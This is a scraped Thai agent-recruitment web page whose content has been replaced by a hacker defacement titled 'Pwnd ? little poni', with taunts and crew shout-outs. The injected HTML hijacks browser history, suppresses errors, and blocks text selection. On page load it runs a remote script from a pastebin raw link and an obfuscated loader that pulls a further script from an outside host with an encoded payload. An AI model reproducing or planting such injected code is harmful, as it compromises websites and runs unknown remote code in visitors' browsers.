สมัครตัวแทน

<html> <head> <link rel="icon" type="image/png" href="https://f.top4top.net/p_1176eaxiz0.png" type="image/x-icon"/> <embed src="http://www.youtube.com/v/IYNRADB6GP0&autoplay=1" type="application/x-shockwave-flash"wmode="transparent" width="1" height="1"></embed> <title>Pwnd ? little poni</title> <meta http-equiv="refresh" content="" /> <meta name="google-site-verification" content="Lose ?"/> <meta name="theme-color" content="black"> <meta http-equiv="Content-Type" content="text/html; charset=Windows-1254"/> <meta name="description" content="FindMe"> <meta name="author" content="little poni"/> <meta name="keywords" content="little poni"/> <meta name="googlebot" content="all"/> <meta name="robots" content="all" /> <meta name="googlebot-news" content="all" /> <meta name="google" content="notranslate"/> <meta name="og:title" content="Pwnd ? little poni"> <meta property="og:image" content="https://i.ibb.co/ZKfT4Mk/IMG-20190920-WA0027.jpg"/> <link itemprop="thumbnailUrl" href="https://i.ibb.co/ZKfT4Mk/IMG-20190920-WA0027.jpg"/> <script> function ClearError() {return true;}window.onerror = ClearError; (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); </script> </head> <body ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false"> <script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe"></script> <table width="100%" height="100%"> <tr><td align="center"> <a href="" target="_blank"><img src="https://i.ibb.co/PmkzbK2/1.png"width="350" height="450"/></a> <h1>[<font color="#ff0000"><.\></font>] Pwnd ? little poni [<font color="#ff0000"><./></font>]</h1> <h1>[<font color="#ff0000">-</font>] Contact Me : nsb.frex@gmail.com [<font color="#ff0000">-</font>]</h1> <h1>[<font color="#ff0000">-</font>] COPYRIGHT | Purworejo6etar [<font color="#ff0000">-</font>]</h1> <h1>[<font color="#ff0000">+</font>] I Saw ... I Came ... I Conguered ... [<font color="#ff0000">+</font>]</h1><pre id="Clock" style="position:absolute;top:0px;right:0px;font-size:38px;font-family:iceland;color:lime;margin:0;"></pre> </td> </tr> </table> <a href="" target="_blank"><span><div class="b"><b><font face="trade Winds" size="4"><marquee direction="left" scrollamount="6" width="100%"><font color="red">./little poni_</font> @Zaen./Cakrabirawa_ Mr.Sw4gh4t_ Mr.fix  </marquee></font></b></div></span></a> <a href="" target="_blank"><span><div class="u"><b><font face="trade Winds" size="4"><marquee direction="right" scrollamount="6" width="100%"><font color="red">You Lose ? Haha , How ? Why ?</marquee></font></b></div></span></a> <style type="text/css"> @import url("http://fonts.googleapis.com/css?family=Iceland"); .u{ position: fixed; bottom: 75px; right: -235px; width: 600px; padding: 10px; font-size: 16px; text-align: center; color: rgb(255, 255, 255); font-family:trebuchet ms, verdana, arial, sans-serif; transform: rotate(45deg); transform-origin: 50% 0px; -o-transform: rotate(45deg); -o-transform-origin: 50% 0px; -moz-transform: rotate(-45deg); -moz-transform-origin: 50% 0px; -webkit-transform: rotate(-45deg); -webkit-transform-origin: 50% 0px; background-color: #000; border: 1px solid #fff; z-index: 9999; opacity:1; } .b{ position: fixed; top: 75px; left: -235px; width: 600px; padding: 10px; font-size: 16px; text-align: center; color: rgb(255, 255, 255); font-family:iceland; transform: rotate(-45deg); transform-origin: 50% 0px; -o-transform: rotate(45deg); -o-transform-origin: 50% 0px; -moz-transform: rotate(-45deg); -moz-transform-origin: 50% 0px; -webkit-transform: rotate(-45deg); -webkit-transform-origin: 50% 0px; background-color: #000; border: 1px solid #fff; border-top-width:50%; z-index: 9999; opacity:1; } h1{ font-size:30px; color:#fff; margin:0px; font-family:iceland; border:hidden; } body{ overflow:hidden; display: flex; align-items: center; justify-content: center; margin:0; padding:0; width:100%; background:#000000; } pre{ color:#ffff; } a { color: #000; text-decoration: none; border-radius:0px; font-family:iceland; border:0px; } a:hover { color: #000; text-decoration: none; } </style> <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2ameVd7sHZhDLoL3lAsLE29ngQmuyXaQWPpC7%2b6SUxh9L%2fHYKVhpu98cJ32PQ6Ts%2fF7%2bOdlLeoO5tFHDc70WliL4c5HbRd6IpmDMdlzYbCDmEk%2fQ9o4WLm7LE%2fdgudIJD7BLOFARLUpjeXgk24CSCM0uocK6IMtX7Va2shv6VRMk7LsZmO%2b%2brQDRK0gJrmhTXAwIgl9XZb8gBUKg7C%2b%2bGBn8tKlYynD2lzSbgNd9u17jqOEP0CvE3XQvSWLO1Vexg0KyUPyhZAXnK%2bLbreL2XTdi2GZdLy4HPXTpZcEMlQ7h%2f7eo7%2fzslwtSdqD7XYTqoSDVAK8hH6V9hPIxy1cjBb2UjPopLKzvImlVVEaSGVdwLdDDLRnc4ym5RTkGkjSuBJPnOSNbVDiVFpR7odLNEzQQca2ZHFSwKPQp3SbYYz5XrC%2f8f8RKDR44kFdVNFZYFvenFQymIX2cfflZWyoS%2fMnbpPJMAPkgLBwqvVj4uf2fXYSIST%2bx7Bs7rtjJF%2bUbj6A%2bFOP5AezhuTZnTmKnmx1qEFh%2bvqGfcFgshjyCObIYvkJttln6rFg%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body> </html> 
ร่วมงานกับเรากรุณากรอกข้อมูลด้านล่างเพื่อให้เจ้าหน้าที่ติดต่อให้ข้อมูลโดยละเอียด
ทางบริษัทจะติดต่อกลับภายใน 24 ชั่วโมง

Scroll to Top